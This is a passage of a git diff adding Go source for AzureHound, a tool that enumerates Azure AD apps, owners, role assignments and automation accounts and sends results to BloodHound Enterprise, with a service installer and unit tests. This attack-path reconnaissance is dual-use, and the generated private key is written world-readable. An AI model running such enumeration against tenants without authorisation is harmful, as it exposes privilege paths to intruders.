else { + config.AzSecret.Set(secret) + } + + } + + // Configure BloodHound Enterprise Connection + if confirm("Setup connection to BloodHound Enterprise", true) { + if bheUrl, err := prompt("BloodHound Enterprise URL", config.ValidateURL, false); err != nil { + return err + } else if bheTokenId, err := prompt("BloodHound Enterprise Token ID", validateGuid, false); err != nil { + return err + } else if bheToken, err := prompt("BloodHound Enterprise Token", nil, true); err != nil { + return err + } else { + config.BHEUrl.Set(bheUrl) + config.BHETokenId.Set(bheTokenId) + config.BHEToken.Set(bheToken) + } + } + + // Configure Proxy + if confirm("Set proxy URL", true) { + if proxyURL, err := prompt("Proxy URL", config.ValidateURL, false); err != nil { + return err + } else { + if parsedURL, err := url.Parse(proxyURL); err != nil { + return err + } else { + if parsedURL.Scheme != "https" && parsedURL.Scheme != "http" { + return errors.New("unsupported proxy url scheme") + } else { + config.Proxy.Set(proxyURL) + } + } + } + } + + // Configure Logging + if confirm("Setup AzureHound logging", true) { + if idx, _, err := choose("Verbosity", verbosityOptions, 1); err != nil { + return err + } else if logFile, err := prompt("Log file (optional)", nil, false); err != nil { + return err + } else { + config.VerbosityLevel.Set(idx - 1) + config.LogFile.Set(logFile) + config.JsonLogs.Set(confirm("Enable Structured Logs", false)) + } + } + + // writing the configfile path in the configfile is confusing + config.ConfigFile.Set(nil) + if err := os.MkdirAll(configDir, os.ModePerm); err != nil { + return err + } else if err := viper.WriteConfigAs(configFile); err != nil { + return err + } else { + fmt.Fprintf(os.Stderr, "\nConfiguration written to %s\n", configFile) + } + + if genCert { + if cert, key, err := generateCert(config.AzKeyPass.Value().(string)); err != nil { + return err + } else if err := os.WriteFile(genCertPath, cert, 0644); err != nil { + return err + } else if err := os.WriteFile(genKeyPath, key, 0644); err != nil { + return err + } else { + fmt.Fprintf(os.Stderr, "Key written to %s\n", genKeyPath) + fmt.Fprintf(os.Stderr, "Certificate written to %s\n", genCertPath) + fmt.Fprintln(os.Stderr, "\nEnsure certificate is uploaded to your application's client credentials") + } + } + return nil +} + +func prompt(label string, validator func(string) error, isSensitive bool) (string, error) { + p := promptui.Prompt{ + Label: label, + Validate: validator, + } + if isSensitive { + p.HideEntered = true + p.Mask = '*' + } + return p.Run() +} + +func choose(label string, items []string, pos int) (int, string, error) { + s := promptui.Select{ + Label: label, + CursorPos: pos, + Items: items, + Templates: &promptui.SelectTemplates{ + Selected: fmt.Sprintf(`{{ "%s:" | faint }} {{ . }}`, label), + }, + } + return s.Run() +} + +func confirm(label string, defaultYes bool) bool { + p := promptui.Prompt{ + Label: label, + HideEntered: true, + IsConfirm: true, + } + if defaultYes { + p.Default = "y" + } + _, err := p.Run() + return err == nil +} + +func validateGuid(input string) error { + _, err := uuid.FromString(input) + return err +} + +func validatePem(input string) error { + if content, err := ioutil.ReadFile(input); err != nil { + return err + } else if pemFile, _ := pem.Decode(content); pemFile == nil { + return fmt.Errorf("Invalid PEM encoded file") + } else { + return nil + } +} + +func validateUserPrincipalName(input string) error { + _, err := mail.ParseAddress(input) + return err +} + +var verbosityOptions = []string{ + "Disabled", + "Default", + "Debug", + "Trace", +} + +func generateCert(passphrase string) ([]byte, []byte, error) { + var ( + cert = &x509.Certificate{ + Subject: pkix.Name{ + CommonName: "azurehound", + }, + NotBefore: time.Now(), + NotAfter: time.Now().AddDate(1, 0, 0), + } + + certPEM = bytes.Buffer{} + keyPEM = bytes.Buffer{} + ) + + // Generate random serial number for certificate + if serial, err := rand.Int(rand.Reader, big.NewInt(math.MaxInt64)); err != nil { + return nil, nil, err + } else { + cert.SerialNumber = serial + } + + // Generate rsa keys and certificate and encode to PEM files + if privateKey, err := rsa.GenerateKey(rand.Reader, 4096); err != nil { + return nil, nil, err + } else if data, err := x509.CreateCertificate(rand.Reader, cert, cert, &privateKey.PublicKey, privateKey); err != nil { + return nil, nil, err + } else if err := pem.Encode(&certPEM, &pem.Block{Type: "CERTIFICATE", Bytes: data}); err != nil { + return nil, nil, err + } else if data, err := pkcs8.MarshalPrivateKey(privateKey, []byte(passphrase), nil); err != nil { + return nil, nil, err + } else if err := pem.Encode(&keyPEM, &pem.Block{Type: "PRIVATE KEY", Bytes: data}); err != nil { + return nil, nil, err + } else { + return certPEM.Bytes(), keyPEM.Bytes(), nil + } +} diff --git a/cmd/install_windows.go b/cmd/install_windows.go new file mode 100644 index 0000000..579493a --- /dev/null +++ b/cmd/install_windows.go @@ -0,0 +1,157 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "fmt" + "io" + "os" + "path/filepath" + "time" + + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/spf13/cobra" + + "golang.org/x/sys/windows/svc/eventlog" + "golang.org/x/sys/windows/svc/mgr" +) + +func init() { + rootCmd.AddCommand(installCmd) +} + +var installCmd = &cobra.Command{ + Use: "install", + Short: "Installs AzureHound as a system service for BloodHound Enterprise", + Run: installCmdImpl, + PersistentPreRunE: persistentPreRunE, + SilenceUsage: true, +} + +func installCmdImpl(cmd *cobra.Command, args []string) { + var ( + config = mgr.Config{ + DisplayName: constants.DisplayName, + Description: constants.Description, + StartType: mgr.StartAutomatic, + DelayedAutoStart: true, + } + recoveryActions = []mgr.RecoveryAction{ + {Type: mgr.ServiceRestart, Delay: 5 * time.Second}, + {Type: mgr.ServiceRestart, Delay: 30 * time.Second}, + {Type: mgr.ServiceRestart, Delay: 60 * time.Second}, + } + ) + + if err := configureService(); err != nil { + exit(fmt.Errorf("failed to configure service: %w", err)) + } else if err := installService(constants.DisplayName, config, recoveryActions); err != nil { + exit(fmt.Errorf("failed to install service: %w", err)) + } +} + +func configureService() error { + var ( + configDir = config.SystemConfigDirs()[0] + sysConfig = filepath.Join(configDir, "config.json") + userConfig = config.ConfigFile.Value().(string) + ) + + if err := os.MkdirAll(configDir, os.ModePerm); err != nil { + return err + } + + // Confirm use of existing service config + if shouldUseConfig(sysConfig) { + return nil + } + + // Confirm use of existing user config + if shouldUseConfig(userConfig) { + return copyFile(userConfig, sysConfig) + } + + config.ConfigFile.Set(sysConfig) + return configure() +} + +func shouldUseConfig(config string) bool { + if _, err := os.Stat(config); err != nil { + return false + } else { + fmt.Fprintf(os.Stderr, "Detected configuration at %s.\n", config) + return confirm("Use these settings to configure the service", true) + } +} + +func copyFile(src, dest string) error { + if srcFile, err := os.Open(src); err != nil { + return err + } else if destFile, err := os.Create(dest); err != nil { + return err + } else { + defer srcFile.Close() + defer destFile.Close() + if _, err := io.Copy(destFile, srcFile); err != nil { + return err + } + } + return nil +} + +func installService(name string, config mgr.Config, recoveryActions []mgr.RecoveryAction, args ...string) error { + if exe, err := getExePath(); err != nil { + return err + } else if wsm, err := mgr.Connect(); err != nil { + return err + } else { + defer wsm.Disconnect() + + if err := createService(wsm, name, exe, config, recoveryActions, args...); err != nil { + return err + } else { + return nil + } + } +} + +func createService(wsm *mgr.Mgr, name string, exe string, config mgr.Config, recoveryActions []mgr.RecoveryAction, args ...string) error { + if service, err := wsm.OpenService(name); err == nil { + service.Close() + return fmt.Errorf("service %s already exists", name) + } else if service, err := wsm.CreateService(name, exe, config, args...); err != nil { + return err + } else { + defer service.Close() + + if err := eventlog.InstallAsEventCreate(name, eventlog.Error|eventlog.Warning|eventlog.Info); err != nil { + service.Delete() + return fmt.Errorf("failed to add %s to event log: %w", name, err) + } + + if recoveryActions != nil { + if err := service.SetRecoveryActions(recoveryActions, 60); err != nil { + service.Delete() + return fmt.Errorf("failed to set recovery actions: %w", err) + } + } + + return nil + } +} diff --git a/cmd/list-app-owners.go b/cmd/list-app-owners.go new file mode 100644 index 0000000..c155d82 --- /dev/null +++ b/cmd/list-app-owners.go @@ -0,0 +1,116 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAppOwnersCmd) +} + +var listAppOwnersCmd = &cobra.Command{ + Use: "app-owners", + Long: "Lists Azure AD App Owners", + Run: listAppOwnersCmdImpl, + SilenceUsage: true, +} + +func listAppOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure app owners...") + start := time.Now() + stream := listAppOwners(ctx, azClient, listApps(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAppOwners(ctx context.Context, client client.AzureClient, apps <-chan azureWrapper[models.App]) <-chan azureWrapper[models.AppOwners] { + var ( + out = make(chan azureWrapper[models.AppOwners]) + streams = pipeline.Demux(ctx.Done(), apps, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + params = query.GraphParams{} + ) + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for app := range stream { + var ( + data = models.AppOwners{ + AppId: app.Data.AppId, + } + count = 0 + ) + for item := range client.ListAzureADAppOwners(ctx, app.Data.Id, params) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing owners for this app", "appId", app.Data.AppId) + } else { + appOwner := models.AppOwner{ + Owner: item.Ok, + AppId: app.Data.Id, + } + log.V(2).Info("found app owner", "appOwner", appOwner) + count++ + data.Owners = append(data.Owners, appOwner) + } + } + + if ok := pipeline.Send(ctx.Done(), out, NewAzureWrapper( + enums.KindAZAppOwner, + data, + )); !ok { + return + } + log.V(1).Info("finished listing app owners", "appId", app.Data.AppId, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all app owners") + }() + + return out +} diff --git a/cmd/list-app-owners_test.go b/cmd/list-app-owners_test.go new file mode 100644 index 0000000..978b7a8 --- /dev/null +++ b/cmd/list-app-owners_test.go @@ -0,0 +1,91 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "encoding/json" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListAppOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockAppsChannel := make(chan azureWrapper[models.App]) + mockAppOwnerChannel := make(chan client.AzureResult[json.RawMessage]) + mockAppOwnerChannel2 := make(chan client.AzureResult[json.RawMessage]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADAppOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockAppOwnerChannel).Times(1) + mockClient.EXPECT().ListAzureADAppOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockAppOwnerChannel2).Times(1) + channel := listAppOwners(ctx, mockClient, mockAppsChannel) + + go func() { + defer close(mockAppsChannel) + mockAppsChannel <- NewAzureWrapper(enums.KindAZApp, models.App{}) + mockAppsChannel <- NewAzureWrapper(enums.KindAZApp, models.App{}) + }() + go func() { + defer close(mockAppOwnerChannel) + mockAppOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockAppOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + }() + go func() { + defer close(mockAppOwnerChannel2) + mockAppOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockAppOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.Owners) != 2 { + t.Errorf("got %v, want %v", len(result.Data.Owners), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.Owners) != 1 { + t.Errorf("got %v, want %v", len(result.Data.Owners), 2) + } +} diff --git a/cmd/list-app-role-assignments.go b/cmd/list-app-role-assignments.go new file mode 100644 index 0000000..675df4e --- /dev/null +++ b/cmd/list-app-role-assignments.go @@ -0,0 +1,131 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAppRoleAssignmentsCmd) +} + +var listAppRoleAssignmentsCmd = &cobra.Command{ + Use: "app-role-assignments", + Long: "Lists Azure Active Directory App Role Assignments", + Run: listAppRoleAssignmentsCmdImpl, + SilenceUsage: true, +} + +func listAppRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory app role assignments...") + start := time.Now() + servicePrincipals := listServicePrincipals(ctx, azClient) + stream := listAppRoleAssignments(ctx, azClient, servicePrincipals) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAppRoleAssignments(ctx context.Context, client client.AzureClient, servicePrincipals <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + filteredSPs = make(chan models.ServicePrincipal) + streams = pipeline.Demux(ctx.Done(), filteredSPs, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(filteredSPs) + + for result := range pipeline.OrDone(ctx.Done(), servicePrincipals) { + if servicePrincipal, ok := result.(AzureWrapper).Data.(models.ServicePrincipal); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating app role assignments", "result", result) + return + } else { + if len(servicePrincipal.AppRoles) != 0 { + if ok := pipeline.Send(ctx.Done(), filteredSPs, servicePrincipal); !ok { + return + } + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for servicePrincipal := range stream { + var ( + count = 0 + ) + for item := range client.ListAzureADAppRoleAssignments(ctx, servicePrincipal.Id, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing app role assignments for this service principal", "servicePrincipalId", servicePrincipal) + } else { + log.V(2).Info("found app role assignment", "roleAssignments", item) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZAppRoleAssignment, + Data: models.AppRoleAssignment{ + AppRoleAssignment: item.Ok, + AppId: servicePrincipal.AppId, + TenantId: client.TenantInfo().TenantId, + }, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing app role assignments", "appId", servicePrincipal.AppId, "servicePrincipalId", servicePrincipal.Id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all app role assignments") + }() + + return out +} diff --git a/cmd/list-apps.go b/cmd/list-apps.go new file mode 100644 index 0000000..aabec3e --- /dev/null +++ b/cmd/list-apps.go @@ -0,0 +1,91 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAppsCmd) +} + +var listAppsCmd = &cobra.Command{ + Use: "apps", + Long: "Lists Azure Active Directory Applications", + Run: listAppsCmdImpl, + SilenceUsage: true, +} + +func listAppsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory applications...") + start := time.Now() + stream := listApps(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listApps(ctx context.Context, client client.AzureClient) <-chan azureWrapper[models.App] { + out := make(chan azureWrapper[models.App]) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + count := 0 + for item := range client.ListAzureADApps(ctx, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing applications") + return + } else { + log.V(2).Info("found application", "app", item) + count++ + if ok := pipeline.Send(ctx.Done(), out, NewAzureWrapper( + enums.KindAZApp, + models.App{ + Application: item.Ok, + TenantId: client.TenantInfo().TenantId, + TenantName: client.TenantInfo().DisplayName, + }, + )); !ok { + return + } + } + } + log.Info("finished listing all apps", "count", count) + }() + + return out +} diff --git a/cmd/list-apps_test.go b/cmd/list-apps_test.go new file mode 100644 index 0000000..136d8f0 --- /dev/null +++ b/cmd/list-apps_test.go @@ -0,0 +1,65 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListApps(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + mockChannel := make(chan client.AzureResult[azure.Application]) + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADApps(gomock.Any(), gomock.Any()).Return(mockChannel) + + go func() { + defer close(mockChannel) + mockChannel <- client.AzureResult[azure.Application]{ + Ok: azure.Application{}, + } + mockChannel <- client.AzureResult[azure.Application]{ + Error: mockError, + } + mockChannel <- client.AzureResult[azure.Application]{ + Ok: azure.Application{}, + } + }() + + channel := listApps(ctx, mockClient) + <-channel + if _, ok := <-channel; ok { + t.Error("expected channel to close from an error result but it did not") + } +} diff --git a/cmd/list-automation-account-role-assignments.go b/cmd/list-automation-account-role-assignments.go new file mode 100644 index 0000000..8627b22 --- /dev/null +++ b/cmd/list-automation-account-role-assignments.go @@ -0,0 +1,136 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAutomationAccountRoleAssignment) +} + +var listAutomationAccountRoleAssignment = &cobra.Command{ + Use: "automation-account-role-assignments", + Long: "Lists Azure Automation Account Role Assignments", + Run: listAutomationAccountRoleAssignmentImpl, + SilenceUsage: true, +} + +func listAutomationAccountRoleAssignmentImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure automation account role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listAutomationAccountRoleAssignments(ctx, azClient, listAutomationAccounts(ctx, azClient, subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAutomationAccountRoleAssignments(ctx context.Context, client client.AzureClient, automationAccounts <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), automationAccounts) { + if automationAccount, ok := result.(AzureWrapper).Data.(models.AutomationAccount); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating automation account role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, automationAccount.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + automationAccountRoleAssignments = models.AzureRoleAssignments{ + ObjectId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this automation account", "automationAccountId", id) + } else { + roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId) + + automationAccountRoleAssignment := models.AzureRoleAssignment{ + Assignee: item.Ok, + ObjectId: id, + RoleDefinitionId: roleDefinitionId, + } + log.V(2).Info("found automation account role assignment", "automationAccountRoleAssignment", automationAccountRoleAssignment) + count++ + automationAccountRoleAssignments.RoleAssignments = append(automationAccountRoleAssignments.RoleAssignments, automationAccountRoleAssignment) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZAutomationAccountRoleAssignment, + Data: automationAccountRoleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing automation account role assignments", "automationAccountId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all automation account role assignments") + }() + + return out +} diff --git a/cmd/list-automation-accounts.go b/cmd/list-automation-accounts.go new file mode 100644 index 0000000..736650a --- /dev/null +++ b/cmd/list-automation-accounts.go @@ -0,0 +1,127 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAutomationAccountsCmd) +} + +var listAutomationAccountsCmd = &cobra.Command{ + Use: "automation-accounts", + Long: "Lists Azure Automation Accounts", + Run: listAutomationAccountsCmdImpl, + SilenceUsage: true, +} + +func listAutomationAccountsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure automation accounts...") + start := time.Now() + stream := listAutomationAccounts(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAutomationAccounts(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating automation accounts", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureAutomationAccounts(ctx, id) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing automation accounts for this subscription", "subscriptionId", id) + } else { + resourceGroupId := item.Ok.ResourceGroupId() + automationAccount := models.AutomationAccount{ + AutomationAccount: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: resourceGroupId, + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found automation account", "automationAccount", automationAccount) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZAutomationAccount, + Data: automationAccount, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing automation accounts", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all automation accounts") + }() + + return out +} diff --git a/cmd/list-azure-ad.go b/cmd/list-azure-ad.go new file mode 100644 index 0000000..bca217d --- /dev/null +++ b/cmd/list-azure-ad.go @@ -0,0 +1,130 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the 